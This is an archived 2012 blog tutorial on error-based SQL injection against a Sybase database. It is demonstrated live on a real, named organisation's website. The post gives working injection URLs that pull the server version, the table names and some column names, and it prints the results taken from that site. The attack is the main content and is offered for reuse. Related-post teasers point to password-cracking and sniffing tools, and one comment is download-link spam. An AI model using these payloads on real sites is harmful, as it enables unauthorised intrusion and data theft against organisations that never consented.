Sunday, September 16, 2012

Error-based Sybase Structured Query Language Injection


Tutorial provided by
RIPPER


So here we start with a site.. I'm assuming you understand MySQL Injection.


Put an ' at the end and you will see this

Sybase: Server message: Unclosed quote before the character string ' '

Version Extraction

Now to get the version:

Codehttp://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert%28integer,@@version%29--

So here it is:

Adaptive Server Enterprise/15.0.1/EBF 13819/P/Sun_svr4/OS 5.8/ase1501/2379/64-bit/FBO/Tue Aug 15 04:20:15 2006

Table Extraction

Now lets get some table names

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U'))--

Second table:

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' and name!='boardMembers'))--

Basically keep adding and name!='table name that you get

Here I guess I reach the end of the tables

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' andname!='boardMembers' and name!='events' and name!='galleries' and name!='galleries_photos' and name!='gallery' and name!='gallery_photos' andname!='newsletters' and name!='newsletters_new' and name!='newsreleases' and name!='offices' and name!='publication_import'and name!='publications' andname!='publications_new' and name!='radio' and name!='satellites' and name!='titles')) 

Time to get columns..We will get the columns of boardMembers.

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id= (select id from 

sysobjects where type='U' and name='gallery')))--

Column no.1:  city

Getting column 2:

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery' ) and name!='city'))-- 

You get my point just add and name!='column name that you get.


Thanks for reading!

Related Posts:

  • Wordlists manipulation and generation with Backtrack 5R2 Crunch application Tutorial provided by Keeper Brief Introduction: Ok. This tutorial is going to introduce you with a Backtrack application called Crunch. Mos… Read More
  • Full Ultimate Cross-Site Scripting (XSS) Tutorial Tutorial provided by Zer0Pwn Hello and thanks for reading this tutorial on XSS, written by me. You may be asking as to why I'm creating this tutorial. My inbox has lat… Read More
  • Network mapping with Kismet-newcore + giskismet Tutorial provided by Keeper First make a quick edit to the kismet.conf file, we can do this with nano: Code: nano /pentest/wireless/kismet-newcore/conf/kismet… Read More
  • Using Hydra after connecting to network Tutorial provided by Keeper After gaining access to your network, you can check the strength of your router's access passwords by using a tool called Hydra from THC. Hydra is… Read More
  • Analyzing / Monitoring network captures with dsniff Tutorial provided by Keeper If you readily have access to the network, be it open or encrypted with WEP or WPA, the capture files can show a lot of information on… Read More

1 comment:

  1. AnonymousMarch 30, 2022 at 11:04 PM

    ~ Learning To Hack >>>>> Download Now

    >>>>> Download Full

    ~ Learning To Hack >>>>> Download LINK

    >>>>> Download Now

    ~ Learning To Hack >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete